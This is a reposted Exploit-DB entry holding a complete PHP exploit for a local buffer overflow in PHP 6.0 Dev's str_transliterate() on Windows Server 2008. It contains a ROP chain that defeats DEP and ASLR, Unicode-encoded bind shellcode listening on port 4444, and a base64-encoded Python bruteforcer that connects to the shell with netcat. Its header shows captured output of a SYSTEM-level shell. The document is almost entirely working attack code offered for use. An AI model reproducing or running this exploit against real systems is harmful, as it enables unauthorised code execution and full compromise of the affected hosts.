PHP 6.0 Dev – ‘str_transliterate()’ Local Buffer Overflow (NX + ASLR Bypass)

• Exploit Database
• 13 阅读

• 作者： ryujin
  日期： 2010-04-13
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12189/

• <?php
  /*
  04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
  Tested on Windows 2008 SP1 DEP alwayson 
  Matteo Memelli aka ryujin ( AT ) offsec.com
  original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
  
  Thx to muts and Elwood for helping ;)
  
  Bruteforce script is attached in base64 format.
  
  root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
  (*) Php6 str_transliterate() bof || ryujin # offsec.com
  (*) Bruteforcing WPM ret address...
  (+) Trying base address 0x78000000
  (+) Trying base address 0x77000000
  (+) Trying base address 0x76000000
  (+) Trying base address 0x75000000
  Microsoft Windows [Version 6.0.6001]
  Copyright (c) 2006 Microsoft Corporation.All rights reserved.
  
  C:\wamp\bin\apache\Apache2.2.11>whoami
  whoami
  nt authority\system
  */
  
  error_reporting(0);
  
  $base_s = $_GET['pos_s'];
  $base_e = $_GET['pos_e'];
  $off_s= $_GET['off_s'];
  $off_e= $_GET['off_e'];
  
  if(ini_get_bool('unicode.semantics')) {
   $buff= str_repeat("\u4141", 32);
   $tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM 
   $ptw = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
   $ret = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM
   $wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uFFFF\uFFFF\uFFFF\uFFFF".$ptw; // WPM ARGS
   $garbage = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).
  "\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";";
   eval($garbage);
   $nops= str_repeat("\u9090", 41);
  
   // TH || ROP -> Try Harder or Rest On Pain ;)
   // GETTING SHELLCODE ABSOLUTE ADDRESS
   $rop= "\u40dd\u6FF2"; // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN 6FF240DD
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP 
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
   $rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4 
   $rop .= "\uFDBC\uFFFF"; // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
   $rop .= "\u222B\u6EED"; // ADD EAX,ECX/POP EBX/POP EBP/RETN 6EED222B 
   $rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE) 
   $rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE)
  
   // PATCHING BUFFER ADDY ARG FOR WPM
   $rop .= "\u1C13\u6EE6"; // ADD DWORD PTR DS:[EAX],EAX/RETN6EE61C13
  
   // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
   $rop .= "\uE94E\u6EE6"; // MOV EDX,ECX/POP EBP/RETN 6EE6E94E 
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
   $rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4
   $rop .= "\uFF5C\uFFFF"; // VALUE TO BE POPPED IN ECXFFFFFF5C
   $rop .= "\uE94C\u6EE6"; // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN 6EE6E94C
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
  
   // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
   $rop .= "\u0C54\u6EE7"; // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN6EE70C54
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
  
   // REALIGNING ESP TO WPM AND RETURNING TO IT
   $rop .= "\u8640\u6EE6"; // ADD EAX,-30/POP EBP/RETN 6EE68640
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
   $rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN6EE629F1
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
   $rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN6EE629F1
   $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
   $rop .= "\u2C63\u6FC5"; // XCHG EAX,ESP/RETN6FC52C63
  
   
  
   // unicode bind shellcode port 4444, 318 bytes
   $sh = "\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b".
   "\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824".
   "\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db".
   "\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233".
   "\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02".
   "\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189".
   "\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0".
   "\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a".
   "\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c".
   "\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155".
   "\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0".
   "\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344";
  
   $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
   str_transliterate(0, $exploit, 0);
  } else {
   exit("Error! 'unicode.semantics' has be on!\r\n");
  }
  
  function ini_get_bool($a) {
   $b = ini_get($a);
   switch (strtolower($b)) {
  case 'on':
  case 'yes':
  case 'true':
   return 'assert.active' !== $a;
  case 'stdout':
  case 'stderr':
   return 'display_errors' === $a;
  default:
   return (bool) (int) $b;
   }
  }
  
  /*
  IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt
  cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91
  dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg
  ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g
  c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw
  YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw
  LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6
  IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp
  biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp
  CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh
  cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp
  Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms
  IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k
  Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu
  dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy
  aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9
  PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg
  fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ
  cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y
  ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy
  ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg
  ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg
  Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt
  ZS5zbGVlcCgwLjA1KSAK
  */
  ?>